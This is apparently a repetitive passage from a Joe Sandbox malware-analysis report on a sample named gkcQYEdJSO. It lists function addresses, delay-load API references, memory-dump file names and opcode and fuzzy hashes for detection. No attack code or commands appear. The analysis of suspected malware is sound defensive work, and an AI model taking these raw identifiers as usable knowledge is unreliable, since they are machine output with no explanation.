Instruction Fuzzy Hash: 2BA001E66A928ABC3108B2526E06C3B031DC4C5B65331992FF956C8681A890A85928B1

Function 00DDE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: de3f8274a3aeb11e60cf5fee067e70981e8b55cefb07626e56d11700564e9f0c
Instruction ID: 7a4708c20631b13b9f7e081d2ac1557faf13e4e9c868ee55d7a29f1201b95cf6
Opcode Fuzzy Hash: de3f8274a3aeb11e60cf5fee067e70981e8b55cefb07626e56d11700564e9f0c
Instruction Fuzzy Hash: 2BA001E66A928ABC3108B2526E06C3B031DC4C5B65331992FF956C8681A890A85928B1

Function 00DDE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b10fbca49f28f4162df918912b8af832c9f6f77e2fd948075ee999e8bc9560e2
Instruction ID: 7a4708c20631b13b9f7e081d2ac1557faf13e4e9c868ee55d7a29f1201b95cf6
Opcode Fuzzy Hash: b10fbca49f28f4162df918912b8af832c9f6f77e2fd948075ee999e8bc9560e2
Instruction Fuzzy Hash: 2BA001E66A928ABC3108B2526E06C3B031DC4C5B65331992FF956C8681A890A85928B1

Function 00DDE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dc730be677d65b46501a6f1d23e8d59a51c771a9af74acb83872bf00436b6dd4
Instruction ID: 7a4708c20631b13b9f7e081d2ac1557faf13e4e9c868ee55d7a29f1201b95cf6
Opcode Fuzzy Hash: dc730be677d65b46501a6f1d23e8d59a51c771a9af74acb83872bf00436b6dd4
Instruction Fuzzy Hash: 2BA001E66A928ABC3108B2526E06C3B031DC4C5B65331992FF956C8681A890A85928B1

Function 00DDE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ae3ca448558ad4f4d9a8c1d9722266c504420b2929a8803df8acbf5f84ccdbdf
Instruction ID: 7a4708c20631b13b9f7e081d2ac1557faf13e4e9c868ee55d7a29f1201b95cf6
Opcode Fuzzy Hash: ae3ca448558ad4f4d9a8c1d9722266c504420b2929a8803df8acbf5f84ccdbdf
Instruction Fuzzy Hash: 2BA001E66A928ABC3108B2526E06C3B031DC4C5B65331992FF956C8681A890A85928B1

Function 00DDE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c9eff27a3584bb2233266609d588d0da52ca071faee963b604dceeb489b6b378
Instruction ID: 7a4708c20631b13b9f7e081d2ac1557faf13e4e9c868ee55d7a29f1201b95cf6
Opcode Fuzzy Hash: c9eff27a3584bb2233266609d588d0da52ca071faee963b604dceeb489b6b378
Instruction Fuzzy Hash: 2BA001E66A928ABC3108B2526E06C3B031DC4C5B65331992FF956C8681A890A85928B1

Function 00DDE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE3FC

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 91c4ad2d3f931ec468fbccc68395547caad58c0f4b2706c02d92ea1242d07f65
Instruction ID: 3a00d91bc10e6cbcd9c3ef375fddb821d429404159f5ce03676a9b3a2d3a0778
Opcode Fuzzy Hash: 91c4ad2d3f931ec468fbccc68395547caad58c0f4b2706c02d92ea1242d07f65
Instruction Fuzzy Hash: 60A001E62A919A7D310872516E06C3B431DC8C2B26335A52FF965E9691AC90585928B2

Function 00DDE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE3FC

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6ad3b54a30be0c6f989203f3c0def058527083b31788131caa3d038d89626cc2
Instruction ID: 6b9866c3dd8c607c4748f26bdea73f4ca7c71439393c2809a529997020908cbb
Opcode Fuzzy Hash: 6ad3b54a30be0c6f989203f3c0def058527083b31788131caa3d038d89626cc2
Instruction Fuzzy Hash: A1A001E62AD19ABC310872516E06C3B431DC8C6B62335A92FF956D9691A890585928B2

Function 00DDE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE3FC

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 801b998c591ec6cf6f7bddb6df08de1f98a4e104dbd80f489513d0d404a9e9f3
Instruction ID: 6b9866c3dd8c607c4748f26bdea73f4ca7c71439393c2809a529997020908cbb
Opcode Fuzzy Hash: 801b998c591ec6cf6f7bddb6df08de1f98a4e104dbd80f489513d0d404a9e9f3
Instruction Fuzzy Hash: A1A001E62AD19ABC310872516E06C3B431DC8C6B62335A92FF956D9691A890585928B2

Function 00DDE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE3FC

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5fd6274ea0d642a3e2f50e317ce6bfbb1498116d41a61a6aff7116bccac35585
Instruction ID: 6b9866c3dd8c607c4748f26bdea73f4ca7c71439393c2809a529997020908cbb
Opcode Fuzzy Hash: 5fd6274ea0d642a3e2f50e317ce6bfbb1498116d41a61a6aff7116bccac35585
Instruction Fuzzy Hash: A1A001E62AD19ABC310872516E06C3B431DC8C6B62335A92FF956D9691A890585928B2

Function 00DDE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE3FC

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f88862f65da45731a654fa25ec431d367c63555977acbbe5cbde33ada586b8f8
Instruction ID: 6b9866c3dd8c607c4748f26bdea73f4ca7c71439393c2809a529997020908cbb
Opcode Fuzzy Hash: f88862f65da45731a654fa25ec431d367c63555977acbbe5cbde33ada586b8f8
Instruction Fuzzy Hash: A1A001E62AD19ABC310872516E06C3B431DC8C6B62335A92FF956D9691A890585928B2

Function 00DDE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE3FC

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5e4cd0de393ecf2c7bd77fc9454995a9d97dac295248a93efbed87dd3b74a59e
Instruction ID: 6b9866c3dd8c607c4748f26bdea73f4ca7c71439393c2809a529997020908cbb
Opcode Fuzzy Hash: 5e4cd0de393ecf2c7bd77fc9454995a9d97dac295248a93efbed87dd3b74a59e
Instruction Fuzzy Hash: A1A001E62AD19ABC310872516E06C3B431DC8C6B62335A92FF956D9691A890585928B2

Function 00DDE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE580

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4e66f37b7680de4c0794aabf9ee74ed96e007537c395c50e68879e3141aeffcd
Instruction ID: 58d0756727263691e2ac8756d8e03033f4eea89040469547f6e7855e74348c84
Opcode Fuzzy Hash: 4e66f37b7680de4c0794aabf9ee74ed96e007537c395c50e68879e3141aeffcd
Instruction Fuzzy Hash: 10A002D556D1557C311471516D06C37031DC4C5B55331D55FF555C95D1684058551471

Function 00DDE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE580

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 97ea21bb366b8af13a121348175edf8c0a2d2c999e13e2284d2f3c5995f9d770
Instruction ID: 58d0756727263691e2ac8756d8e03033f4eea89040469547f6e7855e74348c84
Opcode Fuzzy Hash: 97ea21bb366b8af13a121348175edf8c0a2d2c999e13e2284d2f3c5995f9d770
Instruction Fuzzy Hash: 10A002D556D1557C311471516D06C37031DC4C5B55331D55FF555C95D1684058551471

Function 00DDE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE51F

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0d339f10229d51ba8774091eefd86ea7daae9283d51739f30393900b54cce4e6
Instruction ID: e47ce98cfd3af5217a15aa6d8a9cd62b60e046e87deca23194ba18368624b544
Opcode Fuzzy Hash: 0d339f10229d51ba8774091eefd86ea7daae9283d51739f30393900b54cce4e6
Instruction Fuzzy Hash: A8A011C22AC08ABC300832002E02C3B030CC0C2FA0330A82FF802CC280A8800C0828B0

Function 00DDE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE51F

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 72ce40e1e46f9a6b98efc79db6ef5e43800673c8395e82681c68a117a885bee5
Instruction ID: e47ce98cfd3af5217a15aa6d8a9cd62b60e046e87deca23194ba18368624b544
Opcode Fuzzy Hash: 72ce40e1e46f9a6b98efc79db6ef5e43800673c8395e82681c68a117a885bee5
Instruction Fuzzy Hash: A8A011C22AC08ABC300832002E02C3B030CC0C2FA0330A82FF802CC280A8800C0828B0

Function 00DDE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE51F

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cf4565a0f32b297ba6ae65b5645e6ea564c31195abb2dffa3ef6b52ab02f1c48
Instruction ID: e47ce98cfd3af5217a15aa6d8a9cd62b60e046e87deca23194ba18368624b544
Opcode Fuzzy Hash: cf4565a0f32b297ba6ae65b5645e6ea564c31195abb2dffa3ef6b52ab02f1c48
Instruction Fuzzy Hash: A8A011C22AC08ABC300832002E02C3B030CC0C2FA0330A82FF802CC280A8800C0828B0

Function 00DDE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE580

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
